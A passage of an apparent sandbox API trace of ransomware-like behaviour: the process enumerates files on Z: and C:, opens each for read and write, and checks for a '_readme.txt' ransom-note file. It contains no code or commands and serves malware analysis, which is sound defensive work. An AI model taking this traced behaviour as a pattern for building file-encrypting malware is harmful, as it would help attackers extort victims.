lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.360] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Daynev4hNYGuoMWbxLXC.pptx", cAlternateFileName="")) returned 1 [0178.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.360] PathFindExtensionW (pszPath="Z:\\Daynev4hNYGuoMWbxLXC.pptx") returned=".pptx" [0178.365] CreateFileW (lpFileName="Z:\\Daynev4hNYGuoMWbxLXC.pptx" (normalized: "z:\\daynev4hnyguomwbxlxc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.367] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x147e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4s6BCb3WGeEnQU.bmp", cAlternateFileName="")) returned 1 [0178.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.367] PathFindExtensionW (pszPath="Z:\\4s6BCb3WGeEnQU.bmp") returned=".bmp" [0178.371] CreateFileW (lpFileName="Z:\\4s6BCb3WGeEnQU.bmp" (normalized: "z:\\4s6bcb3wgeenqu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.374] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1594c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v0CV5yZU8GBZK.flv", cAlternateFileName="")) returned 1 [0178.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.375] PathFindExtensionW (pszPath="Z:\\v0CV5yZU8GBZK.flv") returned=".flv" [0178.380] CreateFileW (lpFileName="Z:\\v0CV5yZU8GBZK.flv" (normalized: "z:\\v0cv5yzu8gbzk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.382] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOBxEjMJN.swf", cAlternateFileName="")) returned 1 [0178.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.382] PathFindExtensionW (pszPath="Z:\\xgOBxEjMJN.swf") returned=".swf" [0178.387] CreateFileW (lpFileName="Z:\\xgOBxEjMJN.swf" (normalized: "z:\\xgobxejmjn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.389] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOBxEjMJN.swf", cAlternateFileName="")) returned 0 [0178.389] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.391] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.420] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.420] PathFindFileNameW (pszPath="") returned="" [0178.420] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.421] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0178.421] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0178.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.421] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2d2ec90 [0178.422] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0178.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0178.422] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0178.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.423] FindFirstFileW (in: lpFileName="C:\\*" (normalized: "c:\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2cbfa10 [0178.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0178.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27fe0 [0178.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0178.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0178.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.425] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, 